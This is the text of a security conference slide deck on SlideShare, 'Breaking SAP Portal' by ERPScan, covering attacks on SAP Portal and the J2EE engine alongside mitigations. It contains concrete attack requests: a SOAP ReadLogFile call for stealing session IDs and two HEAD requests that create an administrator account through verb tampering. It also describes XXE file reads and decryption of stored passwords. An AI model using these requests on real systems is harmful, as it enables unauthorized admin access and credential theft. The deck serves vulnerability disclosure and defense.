SlideShare ist ein Scribd-Unternehmen logo

Breaking SAP portal (HashDays)

ERPScan
ERPScan

SAP is the most popular business application. There are more than one hundred eighty thousand installations all over the world. But people spend enormous amounts of money to install it and then forget about security. In ERP systems, all business processes are performed, all critical information is stored. The presentation describes how SAP Portal works and kinds of attacks it can be exposed to.

Software
1 von 74
Downloaden Sie, um offline zu lesen
Invest  in  security   to  secure  investments   Breaking  SAP  Portal   Alexander  Polyakov     CTO  ERPScan  
About  ERPScan   •  The   only   360-­‐degree   SAP   Security   solu8on   -­‐   ERPScan   Security   Monitoring  Suite  for  SAP   •  Leader  by  the  number  of  acknowledgements  from  SAP  (  150+  )   •  60+  presentaEons  key  security  conferences  worldwide   •  25  Awards  and  nominaEons   •  Research  team  -­‐  20  experts  with  experience  in    different  areas   of  security   •  Headquarters  in  Palo  Alto  (US)  and  Amsterdam  (EU)       2  
Agenda     •  Say  hello  to  SAP  Portal   •  Breaking  Portal  through  SAP  Services   •  Breaking  Portal  through  J2EE  Engine   •  Breaking  Portal  through  Portal  issues   •  ERPScan  SAP  Pentes8ng  Tool  password  decrypt  module   •  Conclusion   3  
SAP   •  The  most  popular  business  applica8on   •  More  than  180000  customers  worldwide     •  74%  of  Forbes  500  run  SAP   4  
Meet  sapscan.com   hUp://erpscan.com/wp-­‐content/uploads/2012/06/SAP-­‐Security-­‐in-­‐figures-­‐a-­‐global-­‐survey-­‐2007-­‐2011-­‐final.pdf     5  
Say  hello  to  Portal   •  Point  of  web  access  to  SAP  systems   •  Point  of  web  access  to  other  corporate  systems   •  Way  for  aUackers  to  get  access  to  SAP  from  the  Internet   •  ~17  Portals  in  Switzerland,  according  to  Shodan   •  ~11  Portals  in  Switzerland,  according  to  Google   6  
EP  architecture   7  
Okay,  okay.  SAP  Portal  is  important,  and  it  has  many   links  to  other  modules.  So  what?   8  
SAP  Management  Console   9  
SAP  Management  Console   •  SAP  MC  provides  a  common  framework  for  centralized  system   management   •  Allowing  to  see  the  trace  and  log  messages   •  Using  JSESSIONID  from  logs,  aUacker  can  log  into  Portal        What  we  can  find  into  logs?   10   Right!  File  userinterface.log  contains  calculated  JSESIONID   But…aUacker  must  have  creden8al  for  reading  log  file!   Wrong!    
SAP  Management  Console   <?xml  version="1.0"?>   <SOAP-­‐ENV:Envelope  xmlns:SOAP-­‐ENV="hUp://schemas.xmlsoap.org/soap/envelope/"  xmlns:xsi="hUp:// www.w3.org/2001/XMLSchema-­‐instance"  xmlns:xs="hUp://www.w3.org/2001/XMLSchema">   <SOAP-­‐ENV:Header>          <sapsess:Session  xmlns:sapsess="hUp://www.sap.com/webas/630/soap/features/session/">          <enableSession>true</enableSession>   </sapsess:Session>   </SOAP-­‐ENV:Header>   <SOAP-­‐ENV:Body>          <ns1:ReadLogFile  xmlns:ns1="urn:SAPControl">                  <filename>j2ee/cluster/server0/log/system/userinterface.log</filename>                  <filter/>                  <language/>                  <maxentries>%COUNT%</maxentries>                  <statecookie>EOF</statecookie>          </ns1:ReadLogFile>   </SOAP-­‐ENV:Body>   </SOAP-­‐ENV:Envelope>   11  
PrevenEon   Don’t  use  TRACE_LEVEL  =  3  in   produc8on  systems  or  delete  traces             hUp://help.sap.com/saphelp_nwpi71/helpdata/en/ d6/49543b1e49bc1fe10000000a114084/frameset.htm     12  
13   Single-­‐Sign  On  
SSO  (old  but  sEll  works)   •  SAP  implements  SSO  using  the  Header  Variable  Login  Module   creden8als   check   okay   cookie   AUacker   header_auth   cookie   tnx  Mariano  ;)     14  
PrevenEon   •   Implement  proper  network  filters  to  avoid  direct   connec8ons  to  SAP     •   J2EE  Engine.  If  you  use  it  for  Windows  authen8ca8on,   switch  to  SPNegoLoginModule   hUp://help.sap.com/saphelp_nw73ehp1/helpdata/en/d0/ a3d940c2653126e10000000a1550b0/frameset.htm     15  
16   SAP  NetWeaver  J2EE  
Access  control      Web  Dynpro                                          -­‐  programma8c      Portal  iViews                                        -­‐  programma8c      J2EE  Web  apps                                -­‐  declara8ve   ProgrammaEc     By  UME   DeclaraEve       By  WEB.XML   17  
DeclaraEve  access  control   •  The  central  en8ty  in  the  J2EE  authoriza8on  model  is  the  security   role.   •  Programmers  define  the  applica8on-­‐specific  roles  in  the  J2EE   deployment  descriptor   web.xml      web-­‐j2ee-­‐engine.xml   18  
19   Verb  Tampering  
web.xml   <servlet>          <servlet-­‐name>Cri8calAc8on</servlet-­‐name>          <servlet-­‐class>com.sap.admin.Cri8cal.Ac8on</servlet-­‐class>           </servlet>   <servlet-­‐mapping>              <servlet-­‐name>Cri8calAc8on</</servlet-­‐name>              <url-­‐paUern>/admin/cri8cal</url-­‐paUern>      </servlet-­‐mapping   <security-­‐constraint>   <web-­‐resource-­‐collec8on>   <web-­‐resource-­‐name>Restrictedaccess</web-­‐resource-­‐name>   <url-­‐paUern>/admin/*</url-­‐paUern>   <hUp-­‐method>GET</hUp-­‐method>   </web-­‐resource-­‐collec8on>   <auth-­‐constraint>            <role-­‐name>administrator</role-­‐name>    </auth-­‐constraint>   </security-­‐constraint>   20  
Verb  Tampering     •  If  we  are  trying  to  get  access  to  an  applica8on  using  GET  –  we   need  a  login:pass  and  administrator  role   •  What  if  we  try  to  get  access  to  applica8on  using  HEAD  instead   GET?   •  PROFIT!   •  Did  U  know  about  ctc?   21  
Verb  Tampering     Need  Admin  account  in  SAP  Portal?     Just  send  two  HEAD  requests     •  Create  new  user  blabla:blabla     HEAD  /ctc/ConfigServlet?param=com.sap.ctc.u8l.UserConfig;CREATEUSER;USERNAME=blabla,PASSWORD=blabla       •  Add  user  blabla  to  group  Administrators     HEAD  /ctc/ConfigServlet?param=com.sap.ctc.u8l.UserConfig;ADD_USER_TO_GROUP;USERNAME=blabla,GROUPNAME=Administrators       Works  when  UME  uses  JAVA  database       22  
PrevenEon   • Install  SAP  notes  1503579,1616259     • Install  other  SAP  notes  about  Verb  Tampering       • Scan  applica8ons  with  ERPScan  WEB.XML  checker     • Disable  the  applica8ons  that  are  not  necessary     23  
24   Invoker  servlet  
web.xml   <servlet>          <servlet-­‐name>Cri>calAc>on</servlet-­‐name>          <servlet-­‐class>com.sap.admin.Cri>cal.Ac>on</servlet-­‐class>           </servlet>   <servlet-­‐mapping>              <servlet-­‐name>Cri>calAc>on</</servlet-­‐name>              <url-­‐paBern>/admin/cri>cal</url-­‐paBern>      </servlet-­‐mapping   <security-­‐constraint>   <web-­‐resource-­‐collec>on>   <web-­‐resource-­‐name>Restrictedaccess</web-­‐resource-­‐name>   <url-­‐paBern>/admin/*</url-­‐paBern>   <hBp-­‐method>GET</hBp-­‐method>   <hBp-­‐method>HEAD</hBp-­‐method>   </web-­‐resource-­‐collec>on>   <auth-­‐constraint>            <role-­‐name>administrator</role-­‐name>    </auth-­‐constraint>   </security-­‐constraint>   GET  /admin/cri8cal/Cri>calAc>on   GET  /servlet/com.sap.admin.Cri8cal.Ac8on   25  
Invoker  Servlet   •  Want  to  execute  an  OS  command  on  J2EE  server  remotely?   •  Maybe  upload  a  backdoor  in  a  Java  class?   •  Or  sniff  all  traffic  ?   S8ll  remember  ctc?   26  
Invoker  Servlet   27  
PrevenEon   •   Update  to  the  latest  patch  1467771,  1445998     • “EnableInvokerServletGlobally”    must  be  “false”       •   Check  all  WEB.XML  files  with  ERPScan  WEBXML   checker     28  
So,  where  is  Portal?   29  
SAP  Portal   •  User  access  rights  to  objects  are  in  the  Portal  Content  Directory   (PCD)   •  Based  on  ACL   •  2  types  of  access:   –  (design  8me)  for  administrators   –  (run8me)  for  users   30  
Portal    Permission  Levels   31  
End  User  permission   The  objects  where  end  user  permission  is  enabled  affect  the   following  areas  in  Portal:   –  All  Portal  Catalog  obj  with  end  user  permission     –  Authorized  Portal  users  may  access  restricted      Portal  components  by  URL  without  an  intermediate  iView  if  they  are   granted  permission      in  the  appropriate  security  zone.   32  
Administrator  permission   •  Owner  =  full  control  +  modify  permissions   •  Full  control  =  read/write  +  delete  obj   •  Read/Write  =  read+write+edit  proper8es+  add/rem  child   •  Write  (folders  only)  =  create  objects   •  Read  =  view  obj+create  instances        (delta  links  and  copies)   •  None  =  access  not  granted   33  
Role  Assigner  permission   •  The  Role  Assigner  permission  seyng  is  available  for  role  objects   •  It  allows  you  to  determine  which  Portal  users  are  permiUed  to   assign  other  users,  groups,  or  roles  to  the  role  principle  using   the  Role  Assignment  tool   34  
Security  Zones     •  Security  zones  allow  the  system  administrator  to  control  which  Portal   components  and  Portal  services  a  Portal  user  can  launch   •  A  security  zone  specifies  the  vendor  ID,  the  security  area,  and  safety  level  for   each  Portal  component  and  Portal  service   •  The  security  zone  is  defined  in  a  Portal  applica8on  descriptor  XML  file   •  A  Portal  component  or  service  can  only  belong  to  one  security  zone;   however,  Portal  components  and  services  may  share  the  same  safety  level   •  Zones  allows  the  administrator  to  assign  permissions  to  a  safety  level,   instead  of  assigning  them  directly  to  each  Portal  component  or  service   35   Why?  To  group  mul>ple  iViews  easily    
36   We  can  get  access  to  Portal   iViews    using  direct  URL:     /irj/servlet/prt/portal/prtroot/<iView_ID>     And  only  Security  Zone  rights  will  be  checked    
Security  Zones     •  So,  SecZones  offer  an  extra,  but  op8onal,  layer  of  code-­‐level   security  to  iViews   –  User-­‐>  check  ”end  user”  permission  to  the  role-­‐>  view  iView   –  User-­‐>  check  ”end  user”  permission  to  the  role-­‐>  check  ”end   user”  permission  to  the  SecZone  -­‐>  view  iView     By  default,  this  func8onality  is  disabled   37  
38   So  I  wonder  how  many  Portal   applica8ons  with  NoLow  Safety   exist?  
Safety  Levels  for  Security  Zone   •  No  Safety   –  Anonymous  users  are  permiUed  to  access  portal  components  defined  in   the  security  zone.   •  Low  Safety   –  A  user  must  be  at  least  an  authen8cated  portal  user  to  access  portal   components  defined  in  the  security  zone.   •  Medium  Safety   –  A  user  must  be  assigned  to  a  par8cular  portal  role  that  is  authorized  to   access  portal  components  defined  in  the  security  zone   •  High  Safety   –  A  user  must  be  assigned  to  a  portal  role  with  higher  administra8ve  rights   that  is  authorized  to  access  portal  components  defined  in  the  security   zone.   39  
No  safety  zone   Many  custom  applica8ons  with  low  security  level  zone   40  
PrevenEon   Check  security  zones  permissions     • hUp://help.sap.com/saphelp_nw70/helpdata/en/25/85de55a94c4b5fa7a2d74e8ed201b0/frameset.htm   • hUp://help.sap.com/saphelp_nw70/helpdata/en/f6/2604db05fd11d7b84200047582c9f7/frameset.htm   41  
SAP  Portal   •  Web  based  services   •  All  OWASP  TOP10  actual     –  XSS   –  Phishing   –  Traversal   –  XXE   –  …     42  
43   EPCF  
XSS   •  Many  XSSs  in  Portal   •  But  some8mes  “hUponly”   •  But  when  we  exploit  XSS,  we  can  use  the  features  of  SAP  Portal   44  
45   <SCRIPT>      alert(EPCM.loadClientData("urn:com.sap.myObjects",  "person");   </SCRIPT>  
EPCF          EPCF  provides  a  JavaScript  API  designed  for  the  client-­‐side   communica8on  between  portal  components  and  the  portal   core  framework   •  Enterprise  Portal  Client  Manager  (EPCM)   •  iViews  can  access  the  EPCM  object  from  every  portal  page   or  IFrame   •  Every  iView  contains  the  EPCM  object   •  For  example,  EPCF  used  for  transient  user  data  buffer  for  iViews   46  
PrevenEon    Install  SAP  note  1656549   47  
KM  Phishing   SAP  Knowledge  Management  may  be  used  to  create  phishing  pages   48  
49   FIX  
Directory  traversal   50  
Directory  traversal  fix  bypass   51  
PrevenEon   Install  SAP  note  1630293   52  
53   Cut  the  Crap,    Show  Me  the  Hack  
Breaking  SAP  Portal   •  Found  a  file  in  the  OS  of  SAP  Portal  with  the  encrypted   passwords  for  administra8on  and  DB   •  Found  a  file  in  the  OS  of  SAP  Portal  with  keys  to  decrypt   passwords   •  Found  a  vulnerability  (another  one  ;))  which  allows  reading  the   files  with  passwords  and  keys   •  Decrypt  passwords  and  log  into  Portal   •  PROFIT!   54  
Read  file   How  we  can  read  the  file?     –  Directory  Traversal   –  OS  Command  execute     –  XML  External  En8ty  (XXE)   55  
XXE  in  Portal   56  
XXE  in  Portal   57  
XXE   Error  based  XXE   58  
Breaking  SAP  Portal   •  Ok,  we  can  read  files   •  Where  are  the  passwords?   •  The  SAP  J2EE  Engine  stores  the  database  user  SAP<SID>DB;  its   password  is  here:   usrsap<SID>SYSglobalsecuritydataSecStore.proper>es     59  
Where  are  the  passwords?  (config.proper<es)    rdbms.maximum_connec8ons=5   system.name=TTT   secstorefs.keyfile=/oracle/TTT/sapmnt/global/security/data/SecStore.key   secstorefs.secfile=/oracle/TTT/sapmnt/global/security/data/ SecStore.proper8es   secstorefs.lib=/oracle/TTTsapmnt/global/security/lib   rdbms.driverLoca8on=/oracle/client/10x_64/instantclient/ojdbc14.jar   rdbms.connec8on=jdbc/pool/TTT   rdbms.ini8al_connec8ons=1   60  
Where  are  the  passwords?  (config.proper<es)    rdbms.maximum_connec8ons=5   system.name=TTT   secstorefs.keyfile=/oracle/TTT/sapmnt/global/security/data/SecStore.key   secstorefs.secfile=/oracle/TTT/sapmnt/global/security/data/SecStore.proper8es   secstorefs.lib=/oracle/TTTsapmnt/global/security/lib   rdbms.driverLoca8on=/oracle/client/10x_64/instantclient/ojdbc14.jar   rdbms.connec8on=jdbc/pool/TTT   rdbms.ini8al_connec8ons=1   61  
62   But  where  is  the  key?  
SecStore.properEes   $internal/version=Ni4zFF4wMSeaseforCCMxegAfx   admin/host/TTT=7KJuOPPs/+u+14jM7uy7cy7exrZuYvevkSrPxwueur2445yxgBS   admin/password/TTT=7KJuOPPs/+uv+14j56vDc7M7v7dytbGbkgqDp +QD04b0Fh   jdbc/pool/TTT=7KJuOPPs/+u5jM6s1cvvgQ1gzFvarxuUzEJTHTJI0VGegH   admin/port/TTT=7KJuOPPs/+u+1j4vD1cv6ZTvd336rzEd7267Rwr4ZUgRTQ   $internal/check=BJRrz€eUA+bw4XCzdz16zX78u•t   $internal/mode=encrypted   admin/user/TTT=7KJuOPPs/+u+14j6s14sTxXU3ONl3rL6N7yssV75eC6/5S3E   63  
config.properEes    rdbms.maximum_connec8ons=5   system.name=TTT   secstorefs.keyfile=/oracle/TTT/sapmnt/global/security/data/SecStore.key   secstorefs.secfile=/oracle/TTT/sapmnt/global/security/data/SecStore.proper8es   secstorefs.lib=/oracle/TTTsapmnt/global/security/lib   rdbms.driverLoca8on=/oracle/client/10x_64/instantclient/ojdbc14.jar   rdbms.connec8on=jdbc/pool/TTT   rdbms.ini8al_connec8ons=1   64  
Get  the  password   •  We  have  an  encrypted  password   •  We  have  a  key  to  decrypt  it   We  got  the  J2EE  admin  and  JDBC  login:password!   65  
PrevenEon   •   Install  SAP  note  1619539   •   Restrict  read  access  to  files  SecStore.properEes   and  SecStore.key   66  
Portal  post  exploitaEon   •  Lot  of  links  to  other  systems  in  corporate  LAN   •  Using  SSRF,  aUackers  can  get  access  to  these  systems   What  is  SSRF?   67  
SSRF  History:  Basics   •  We  send  Packet  A  to  Service  A   •  Service  A  ini8ates  Packet  B  to  service  B   •  Services  can  be  on  the  same  or  different  hosts   •  We  can  manipulate  some  fields  of  packet  B  within  packet  A   •  Various  SSRF  aUacks  depend  on  how  many  fields  we  can   control  on  packet  B     Packet  A   Packet  B   68  
ParEal  Remote  SSRF:     HTTP  aeacks  on  other  services   HTTP  Server    Corporate   network   Direct  aUack      GET  /vuln.jsp     SSRF  AUack     SSRF  AUack     Get  /vuln.jst     A   B   69  
Gopher  uri  scheme   •  Using  gopher://  uri  scheme,  it  is  possible  to  send  TCP  packets   –   Exploit  OS  vulnerabili8es   –   Exploit  old  SAP  applicaEon  vulnerabiliEes     –   Bypass  SAP  security  restric8ons   –   Exploit  vulnerabili8es  in  local  services     More  info  in  our  BH2012  presenta8on:   SSRF  vs.  Business  Cri>cal  Applica>ons   hUp://erpscan.com/wp-­‐content/uploads/2012/08/SSRF-­‐vs-­‐Businness-­‐cri8cal-­‐applica8ons-­‐ whitepaper.pdf   70  
Portal  post-­‐exploitaEon   71  
Conclusion   It  is  possible  to  protect  yourself  from  these  kinds  of  issues,     and  we  are  working  close  with  SAP  to  keep  customers  secure   It’s  all  in  your  hands   SAP  Guides   Regular  security  assessments   ABAP  code  review   Monitoring  technical  security   SegregaEon  of  DuEes   72  
Future  work    Many  of  the  researched  issues  cannot  be  disclosed  now  because   of   our   good   rela>onship   with   SAP   Security   Response   Team,   whom   I   would   like   to   thank   for   coopera>on.   However,   if   you   want  to  be  the  first  to  see  new  aBacks  and  demos,  follow  us  at   @erpscan  and  aBend  future  presenta>ons:     •  November  9  –  POC  (Korea,  Seoul)   •  November  20  –  ZeroNights  (Russia,  Moscow)   •  November  29  –  DeepSEC  (Austria,  Vienna)           73  
    74   Web:    www.erpscan.com   e-­‐mail:    info@erpscan.com   TwiBer:      @erpscan                @_chipik  

Empfohlen

Breaking SAP portal (DeepSec)
Breaking SAP portal (DeepSec)Breaking SAP portal (DeepSec)
Breaking SAP portal (DeepSec)
ERPScan
 
Breaking SAP portal (HackerHalted)
Breaking SAP portal (HackerHalted)Breaking SAP portal (HackerHalted)
Breaking SAP portal (HackerHalted)
ERPScan
 
Phúc An cung cấp máy in, mực in, máy photocopy, văn phòng phẩm, thiết bị máy ...
Phúc An cung cấp máy in, mực in, máy photocopy, văn phòng phẩm, thiết bị máy ...Phúc An cung cấp máy in, mực in, máy photocopy, văn phòng phẩm, thiết bị máy ...
Phúc An cung cấp máy in, mực in, máy photocopy, văn phòng phẩm, thiết bị máy ...
Thành Nguyễn Hữu
 
JSF 2.0 Preview
JSF 2.0 PreviewJSF 2.0 Preview
JSF 2.0 Preview
Skills Matter
 
19.imagini in laravel5
19.imagini in laravel519.imagini in laravel5
19.imagini in laravel5
Razvan Raducanu, PhD
 
Oracle Access Manager Integration with Microsoft Active Directory for Zero Si...
Oracle Access Manager Integration with Microsoft Active Directory for Zero Si...Oracle Access Manager Integration with Microsoft Active Directory for Zero Si...
Oracle Access Manager Integration with Microsoft Active Directory for Zero Si...
Sumit Gupta
 
Jlook web ui framework
Jlook web ui frameworkJlook web ui framework
Jlook web ui framework
HongSeong Jeon
 
Fusion Applications Administration Overview
Fusion Applications Administration OverviewFusion Applications Administration Overview
Fusion Applications Administration Overview
VihangAstik
 

Empfohlen

Breaking SAP portal (DeepSec)
Breaking SAP portal (DeepSec)Breaking SAP portal (DeepSec)
Breaking SAP portal (DeepSec)
ERPScan
 
Breaking SAP portal (HackerHalted)
Breaking SAP portal (HackerHalted)Breaking SAP portal (HackerHalted)
Breaking SAP portal (HackerHalted)
ERPScan
 
Phúc An cung cấp máy in, mực in, máy photocopy, văn phòng phẩm, thiết bị máy ...
Phúc An cung cấp máy in, mực in, máy photocopy, văn phòng phẩm, thiết bị máy ...Phúc An cung cấp máy in, mực in, máy photocopy, văn phòng phẩm, thiết bị máy ...
Phúc An cung cấp máy in, mực in, máy photocopy, văn phòng phẩm, thiết bị máy ...
Thành Nguyễn Hữu
 
JSF 2.0 Preview
JSF 2.0 PreviewJSF 2.0 Preview
JSF 2.0 Preview
Skills Matter
 
19.imagini in laravel5
19.imagini in laravel519.imagini in laravel5
19.imagini in laravel5
Razvan Raducanu, PhD
 
Oracle Access Manager Integration with Microsoft Active Directory for Zero Si...
Oracle Access Manager Integration with Microsoft Active Directory for Zero Si...Oracle Access Manager Integration with Microsoft Active Directory for Zero Si...
Oracle Access Manager Integration with Microsoft Active Directory for Zero Si...
Sumit Gupta
 
Jlook web ui framework
Jlook web ui frameworkJlook web ui framework
Jlook web ui framework
HongSeong Jeon
 
Fusion Applications Administration Overview
Fusion Applications Administration OverviewFusion Applications Administration Overview
Fusion Applications Administration Overview
VihangAstik
 
Java Web Application Security with Java EE, Spring Security and Apache Shiro ...
Java Web Application Security with Java EE, Spring Security and Apache Shiro ...Java Web Application Security with Java EE, Spring Security and Apache Shiro ...
Java Web Application Security with Java EE, Spring Security and Apache Shiro ...
Matt Raible
 
WSO2 Italia Open Break Session #2 - Microgateway
WSO2 Italia Open Break Session #2 - MicrogatewayWSO2 Italia Open Break Session #2 - Microgateway
WSO2 Italia Open Break Session #2 - Microgateway
Profesia Srl, Lynx Group
 
Introduction to laravel framework
Introduction to laravel frameworkIntroduction to laravel framework
Introduction to laravel framework
Ahmad Fatoni
 
Drupal security
Drupal securityDrupal security
Drupal security
Techday7
 
RESTful API - Best Practices
RESTful API - Best PracticesRESTful API - Best Practices
RESTful API - Best Practices
Tricode (part of Dept)
 
Is Drupal secure?
Is Drupal secure?Is Drupal secure?
Is Drupal secure?
Four Kitchens
 
OUGLS 2016: Guided Tour On The MySQL Source Code
OUGLS 2016: Guided Tour On The MySQL Source CodeOUGLS 2016: Guided Tour On The MySQL Source Code
OUGLS 2016: Guided Tour On The MySQL Source Code
Georgi Kodinov
 
What Every Client Should Do on Their Oracle SOA Projects
What Every Client Should Do on Their Oracle SOA ProjectsWhat Every Client Should Do on Their Oracle SOA Projects
What Every Client Should Do on Their Oracle SOA Projects
Revelation Technologies
 
Drupal and Security: What You Need to Know
Drupal and Security: What You Need to KnowDrupal and Security: What You Need to Know
Drupal and Security: What You Need to Know
Acquia
 
Asynchronous Interfaces
Asynchronous InterfacesAsynchronous Interfaces
Asynchronous Interfaces
maccman
 
Oracle Enterprise Manager Cloud Control 13c for DBAs
Oracle Enterprise Manager Cloud Control 13c for DBAsOracle Enterprise Manager Cloud Control 13c for DBAs
Oracle Enterprise Manager Cloud Control 13c for DBAs
Gokhan Atil
 
Mysql tech day_paris_ps_and_sys
Mysql tech day_paris_ps_and_sysMysql tech day_paris_ps_and_sys
Mysql tech day_paris_ps_and_sys
Mark Leith
 
AnkaraJUG Kasım 2012 - PrimeFaces
AnkaraJUG Kasım 2012 - PrimeFacesAnkaraJUG Kasım 2012 - PrimeFaces
AnkaraJUG Kasım 2012 - PrimeFaces
Ankara JUG
 
MySQL 5.7: Performance Schema Improvements
MySQL 5.7: Performance Schema ImprovementsMySQL 5.7: Performance Schema Improvements
MySQL 5.7: Performance Schema Improvements
Mark Leith
 
Instrumenting plugins for Performance Schema
Instrumenting plugins for Performance SchemaInstrumenting plugins for Performance Schema
Instrumenting plugins for Performance Schema
Mark Leith
 
SAP portal: breaking and forensicating
SAP portal: breaking and forensicating SAP portal: breaking and forensicating
SAP portal: breaking and forensicating
ERPScan
 
If I want a perfect cyberweapon, I'll target ERP
If I want a perfect cyberweapon, I'll target ERPIf I want a perfect cyberweapon, I'll target ERP
If I want a perfect cyberweapon, I'll target ERP
ERPScan
 
SAP SDM Hacking
SAP SDM HackingSAP SDM Hacking
SAP SDM Hacking
ERPScan
 
If I want a perfect cyberweapon, I'll target ERP - second edition
If I want a perfect cyberweapon, I'll target ERP - second editionIf I want a perfect cyberweapon, I'll target ERP - second edition
If I want a perfect cyberweapon, I'll target ERP - second edition
ERPScan
 
SSRF vs. Business-critical applications. Part 2. New vectors and connect-back...
SSRF vs. Business-critical applications. Part 2. New vectors and connect-back...SSRF vs. Business-critical applications. Part 2. New vectors and connect-back...
SSRF vs. Business-critical applications. Part 2. New vectors and connect-back...
ERPScan
 
Forgotten world - Corporate Business Application Systems
Forgotten world - Corporate Business Application SystemsForgotten world - Corporate Business Application Systems
Forgotten world - Corporate Business Application Systems
ERPScan
 
Business breakdown vulnerabilities in ERP via ICS and ICS via ERP
Business breakdown vulnerabilities in ERP via ICS and ICS via ERPBusiness breakdown vulnerabilities in ERP via ICS and ICS via ERP
Business breakdown vulnerabilities in ERP via ICS and ICS via ERP
ERPScan
 

Weitere ähnliche Inhalte

Was ist angesagt?

What Every Client Should Do on Their Oracle SOA Projects
What Every Client Should Do on Their Oracle SOA ProjectsWhat Every Client Should Do on Their Oracle SOA Projects
What Every Client Should Do on Their Oracle SOA Projects
Revelation Technologies
 
Drupal and Security: What You Need to Know
Drupal and Security: What You Need to KnowDrupal and Security: What You Need to Know
Drupal and Security: What You Need to Know
Acquia
 
Mysql tech day_paris_ps_and_sys
Mysql tech day_paris_ps_and_sysMysql tech day_paris_ps_and_sys
Mysql tech day_paris_ps_and_sys
Mark Leith
 

Was ist angesagt? (15)

Java Web Application Security with Java EE, Spring Security and Apache Shiro ...
Java Web Application Security with Java EE, Spring Security and Apache Shiro ...Java Web Application Security with Java EE, Spring Security and Apache Shiro ...
Java Web Application Security with Java EE, Spring Security and Apache Shiro ...
 
WSO2 Italia Open Break Session #2 - Microgateway
WSO2 Italia Open Break Session #2 - MicrogatewayWSO2 Italia Open Break Session #2 - Microgateway
WSO2 Italia Open Break Session #2 - Microgateway
 
Introduction to laravel framework
Introduction to laravel frameworkIntroduction to laravel framework
Introduction to laravel framework
 
Drupal security
Drupal securityDrupal security
Drupal security
 
RESTful API - Best Practices
RESTful API - Best PracticesRESTful API - Best Practices
RESTful API - Best Practices
 
Is Drupal secure?
Is Drupal secure?Is Drupal secure?
Is Drupal secure?
 
OUGLS 2016: Guided Tour On The MySQL Source Code
OUGLS 2016: Guided Tour On The MySQL Source CodeOUGLS 2016: Guided Tour On The MySQL Source Code
OUGLS 2016: Guided Tour On The MySQL Source Code
 
What Every Client Should Do on Their Oracle SOA Projects
What Every Client Should Do on Their Oracle SOA ProjectsWhat Every Client Should Do on Their Oracle SOA Projects
What Every Client Should Do on Their Oracle SOA Projects
 
Drupal and Security: What You Need to Know
Drupal and Security: What You Need to KnowDrupal and Security: What You Need to Know
Drupal and Security: What You Need to Know
 
Asynchronous Interfaces
Asynchronous InterfacesAsynchronous Interfaces
Asynchronous Interfaces
 
Oracle Enterprise Manager Cloud Control 13c for DBAs
Oracle Enterprise Manager Cloud Control 13c for DBAsOracle Enterprise Manager Cloud Control 13c for DBAs
Oracle Enterprise Manager Cloud Control 13c for DBAs
 
Mysql tech day_paris_ps_and_sys
Mysql tech day_paris_ps_and_sysMysql tech day_paris_ps_and_sys
Mysql tech day_paris_ps_and_sys
 
AnkaraJUG Kasım 2012 - PrimeFaces
AnkaraJUG Kasım 2012 - PrimeFacesAnkaraJUG Kasım 2012 - PrimeFaces
AnkaraJUG Kasım 2012 - PrimeFaces
 
MySQL 5.7: Performance Schema Improvements
MySQL 5.7: Performance Schema ImprovementsMySQL 5.7: Performance Schema Improvements
MySQL 5.7: Performance Schema Improvements
 
Instrumenting plugins for Performance Schema
Instrumenting plugins for Performance SchemaInstrumenting plugins for Performance Schema
Instrumenting plugins for Performance Schema
 

Andere mochten auch

SAP portal: breaking and forensicating
SAP portal: breaking and forensicating SAP portal: breaking and forensicating
SAP portal: breaking and forensicating
ERPScan
 
SAP SDM Hacking
SAP SDM HackingSAP SDM Hacking
SAP SDM Hacking
ERPScan
 
If I want a perfect cyberweapon, I'll target ERP - second edition
If I want a perfect cyberweapon, I'll target ERP - second editionIf I want a perfect cyberweapon, I'll target ERP - second edition
If I want a perfect cyberweapon, I'll target ERP - second edition
ERPScan
 
Forgotten world - Corporate Business Application Systems
Forgotten world - Corporate Business Application SystemsForgotten world - Corporate Business Application Systems
Forgotten world - Corporate Business Application Systems
ERPScan
 
Business breakdown vulnerabilities in ERP via ICS and ICS via ERP
Business breakdown vulnerabilities in ERP via ICS and ICS via ERPBusiness breakdown vulnerabilities in ERP via ICS and ICS via ERP
Business breakdown vulnerabilities in ERP via ICS and ICS via ERP
ERPScan
 
Top 10 most interesting vulnerabilities and attacks in SAP
Top 10 most interesting vulnerabilities and attacks in SAPTop 10 most interesting vulnerabilities and attacks in SAP
Top 10 most interesting vulnerabilities and attacks in SAP
ERPScan
 
SAP security made easy
SAP security made easySAP security made easy
SAP security made easy
ERPScan
 

Andere mochten auch (20)

SAP portal: breaking and forensicating
SAP portal: breaking and forensicating SAP portal: breaking and forensicating
SAP portal: breaking and forensicating
 
If I want a perfect cyberweapon, I'll target ERP
If I want a perfect cyberweapon, I'll target ERPIf I want a perfect cyberweapon, I'll target ERP
If I want a perfect cyberweapon, I'll target ERP
 
SAP SDM Hacking
SAP SDM HackingSAP SDM Hacking
SAP SDM Hacking
 
If I want a perfect cyberweapon, I'll target ERP - second edition
If I want a perfect cyberweapon, I'll target ERP - second editionIf I want a perfect cyberweapon, I'll target ERP - second edition
If I want a perfect cyberweapon, I'll target ERP - second edition
 
SSRF vs. Business-critical applications. Part 2. New vectors and connect-back...
SSRF vs. Business-critical applications. Part 2. New vectors and connect-back...SSRF vs. Business-critical applications. Part 2. New vectors and connect-back...
SSRF vs. Business-critical applications. Part 2. New vectors and connect-back...
 
Forgotten world - Corporate Business Application Systems
Forgotten world - Corporate Business Application SystemsForgotten world - Corporate Business Application Systems
Forgotten world - Corporate Business Application Systems
 
Business breakdown vulnerabilities in ERP via ICS and ICS via ERP
Business breakdown vulnerabilities in ERP via ICS and ICS via ERPBusiness breakdown vulnerabilities in ERP via ICS and ICS via ERP
Business breakdown vulnerabilities in ERP via ICS and ICS via ERP
 
Breaking, forensicating and anti-forensicating SAP Portal and J2EE Engine
Breaking, forensicating and anti-forensicating SAP Portal and J2EE EngineBreaking, forensicating and anti-forensicating SAP Portal and J2EE Engine
Breaking, forensicating and anti-forensicating SAP Portal and J2EE Engine
 
Assessing and Securing SAP Solutions
Assessing and Securing SAP SolutionsAssessing and Securing SAP Solutions
Assessing and Securing SAP Solutions
 
Top 10 most interesting vulnerabilities and attacks in SAP
Top 10 most interesting vulnerabilities and attacks in SAPTop 10 most interesting vulnerabilities and attacks in SAP
Top 10 most interesting vulnerabilities and attacks in SAP
 
SAP security made easy
SAP security made easySAP security made easy
SAP security made easy
 
The latest changes to SAP cybersecurity landscape
The latest changes to SAP cybersecurity landscapeThe latest changes to SAP cybersecurity landscape
The latest changes to SAP cybersecurity landscape
 
Practical pentesting of ERPs and business applications
Practical pentesting of ERPs and business applicationsPractical pentesting of ERPs and business applications
Practical pentesting of ERPs and business applications
 
Attacking SAP Mobile
Attacking SAP MobileAttacking SAP Mobile
